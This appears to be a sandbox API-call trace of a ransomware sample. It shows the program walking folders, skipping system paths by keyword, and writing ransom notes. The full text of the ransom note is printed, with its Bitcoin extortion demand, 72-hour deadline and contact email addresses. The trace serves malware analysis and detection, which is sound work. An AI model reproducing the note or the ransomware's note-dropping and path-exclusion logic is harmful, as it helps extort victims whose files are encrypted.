	[0166.358] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0166.358] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cac780b, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7cac780b, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7caeda46, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0166.358] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c9702e4, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7c9702e4, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7cac780b, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0166.358] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1da7a7ac, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1da7a7ac, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1da7a7ac, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ShortcutBackups", cAlternateFileName="SHORTC~1")) returned 1
	[0166.358] lstrcmpW (lpString1="ShortcutBackups", lpString2="..") returned 1
	[0166.358] lstrcmpW (lpString1="ShortcutBackups", lpString2=".") returned 1
	[0166.358] lstrcpyW (in: lpString1=0x189b6c, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration"
	[0166.359] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\"
	[0166.359] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\", lpString2="ShortcutBackups" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups"
	[0166.359] lstrcpyW (in: lpString1=0x189064, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups"
	[0166.359] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\"
	[0166.370] lstrcpyW (in: lpString1=0x188c54, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\"
	[0166.370] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\*.*") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\*.*"
	[0166.371] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\*.*" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\shortcutbackups\\*.*"), lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1da7a7ac, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1da7a7ac, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1da7a7ac, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9370
	[0166.371] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\*.*") returned 83
	[0166.371] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0166.371] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\*.*", cchLength=0x53 | out: lpsz="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\shortcutbackups\\*.*") returned 0x53
	[0166.371] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.372] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\shortcutbackups\\*.*", lpSrch="windows") returned 0x0
	[0166.372] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.372] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\shortcutbackups\\*.*", lpSrch="boot") returned 0x0
	[0166.372] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.372] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\shortcutbackups\\*.*", lpSrch="system volume information") returned 0x0
	[0166.372] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.373] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\shortcutbackups\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0166.373] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.373] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\shortcutbackups\\*.*", lpSrch="temp") returned 0x0
	[0166.373] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.373] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\shortcutbackups\\*.*", lpSrch="program files") returned 0x0
	[0166.373] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.373] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\shortcutbackups\\*.*", lpSrch="program files (x86)") returned 0x0
	[0166.373] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.374] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\shortcutbackups\\*.*", lpSrch="appdata") returned 0x0
	[0166.374] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.374] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\shortcutbackups\\*.*", lpSrch="application data") returned 0x0
	[0166.374] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.374] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\shortcutbackups\\*.*", lpSrch="winnt") returned 0x0
	[0166.374] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.374] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\shortcutbackups\\*.*", lpSrch="tmp") returned 0x0
	[0166.374] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.375] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\shortcutbackups\\*.*", lpSrch="cache") returned 0x0
	[0166.375] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.375] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\shortcutbackups\\*.*", lpSrch="temporary internet files") returned 0x0
	[0166.375] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.375] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\shortcutbackups\\*.*", lpSrch="webcache") returned 0x0
	[0166.376] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.376] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\shortcutbackups\\*.*", lpSrch="inetcache") returned 0x0
	[0166.376] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.376] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\shortcutbackups\\*.*", lpSrch="nvidia") returned 0x0
	[0166.376] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.376] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\shortcutbackups\\*.*", lpSrch="packages") returned 0x0
	[0166.376] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.377] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\shortcutbackups\\*.*", lpSrch="cookies") returned 0x0
	[0166.377] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.377] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\shortcutbackups\\*.*", lpSrch="programdata") returned 0x0
	[0166.377] FindNextFileW (in: hFindFile=0xfb9370, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1da7a7ac, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1da7a7ac, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1da7a7ac, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0166.377] FindNextFileW (in: hFindFile=0xfb9370, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1da7a7ac, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1da7a7ac, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1da7a7ac, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0
	[0166.377] FindClose (in: hFindFile=0xfb9370 | out: hFindFile=0xfb9370) returned 1
	[0166.378] FindClose (in: hFindFile=0xfb9370 | out: hFindFile=0xfb9370) returned 0
	[0166.378] lstrcpyW (in: lpString1=0x189064, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups"
	[0166.378] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\*.*") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\*.*"
	[0166.378] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0166.379] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0166.379] wsprintfW (in: param_1=0x188950, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\HELP_DECRYPT_YOUR_FILES.TXT") returned 107
	[0166.379] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\shortcutbackups\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0166.380] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0166.380] WriteFile (in: hFile=0x39c, lpBuffer=0x187d08*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x188c2c, lpOverlapped=0x0 | out: lpBuffer=0x187d08*, lpNumberOfBytesWritten=0x188c2c*=0xc46, lpOverlapped=0x0) returned 1
	[0166.385] CloseHandle (hObject=0x39c) returned 1
	[0166.385] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x187cd8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x187cd8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0166.386] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0166.386] GetUserNameA (in: lpBuffer=0x187bbc, pcbBuffer=0x187cd4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x187cd4) returned 1
	[0166.387] wsprintfW (in: param_1=0x188b58, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0166.387] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\shortcutbackups\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0166.388] SetFilePointer (in: hFile=0x39c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0166.388] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0166.388] WriteFile (in: hFile=0x39c, lpBuffer=0x188b58*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x188c34, lpOverlapped=0x0 | out: lpBuffer=0x188b58*, lpNumberOfBytesWritten=0x188c34*=0x30, lpOverlapped=0x0) returned 1
	[0166.388] CloseHandle (hObject=0x39c) returned 1
	[0166.389] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0166.389] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0166.389] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0166.389] wsprintfW (in: param_1=0x188910, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\HELP_DECRYPT_YOUR_FILES.HTML") returned 108
	[0166.389] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\shortcutbackups\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0166.390] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0166.390] WriteFile (in: hFile=0x39c, lpBuffer=0x188104*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x188c28, lpOverlapped=0x0 | out: lpBuffer=0x188104*, lpNumberOfBytesWritten=0x188c28*=0x808, lpOverlapped=0x0) returned 1
	[0166.394] CloseHandle (hObject=0x39c) returned 1
	[0166.395] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0166.395] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1880ec, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1880ec*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0166.396] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0166.396] GetUserNameA (in: lpBuffer=0x187fd0, pcbBuffer=0x1880e8 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1880e8) returned 1
	[0166.397] wsprintfA (in: param_1=0x188b18, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0166.397] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\shortcutbackups\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0166.398] SetFilePointer (in: hFile=0x39c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0166.398] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0166.398] WriteFile (in: hFile=0x39c, lpBuffer=0x188b18*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x188c30, lpOverlapped=0x0 | out: lpBuffer=0x188b18*, lpNumberOfBytesWritten=0x188c30*=0x43, lpOverlapped=0x0) returned 1
	[0166.398] CloseHandle (hObject=0x39c) returned 1
	[0166.399] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\*.*" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\shortcutbackups\\*.*"), lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1da7a7ac, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1da7a7ac, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x7cb3a0ad, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb8ff0
	[0166.399] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\*.*") returned 83
	[0166.399] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0166.400] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\*.*", cchLength=0x53 | out: lpsz="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\shortcutbackups\\*.*") returned 0x53
	[0166.400] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.400] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\shortcutbackups\\*.*", lpSrch="windows") returned 0x0
	[0166.400] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.400] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\shortcutbackups\\*.*", lpSrch="boot") returned 0x0
	[0166.400] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.401] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\shortcutbackups\\*.*", lpSrch="system volume information") returned 0x0
	[0166.401] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.401] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\shortcutbackups\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0166.401] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.401] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\shortcutbackups\\*.*", lpSrch="temp") returned 0x0
	[0166.401] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.401] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\shortcutbackups\\*.*", lpSrch="program files") returned 0x0
	[0166.401] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.402] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\shortcutbackups\\*.*", lpSrch="program files (x86)") returned 0x0
	[0166.402] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.402] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\shortcutbackups\\*.*", lpSrch="appdata") returned 0x0
	[0166.402] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.402] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\shortcutbackups\\*.*", lpSrch="application data") returned 0x0
	[0166.402] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.402] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\shortcutbackups\\*.*", lpSrch="winnt") returned 0x0
	[0166.403] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.403] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\shortcutbackups\\*.*", lpSrch="tmp") returned 0x0
	[0166.403] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.403] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\shortcutbackups\\*.*", lpSrch="cache") returned 0x0
	[0166.403] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.403] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\shortcutbackups\\*.*", lpSrch="temporary internet files") returned 0x0
	[0166.403] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.404] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\shortcutbackups\\*.*", lpSrch="webcache") returned 0x0
	[0166.404] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.404] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\shortcutbackups\\*.*", lpSrch="inetcache") returned 0x0
	[0166.404] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.404] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\shortcutbackups\\*.*", lpSrch="nvidia") returned 0x0
	[0166.404] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.404] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\shortcutbackups\\*.*", lpSrch="packages") returned 0x0
	[0166.404] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.405] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\shortcutbackups\\*.*", lpSrch="cookies") returned 0x0
	[0166.405] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.405] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\shortcutbackups\\*.*", lpSrch="programdata") returned 0x0
	[0166.405] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0166.405] lstrcmpW (lpString1=".", lpString2=".") returned 0
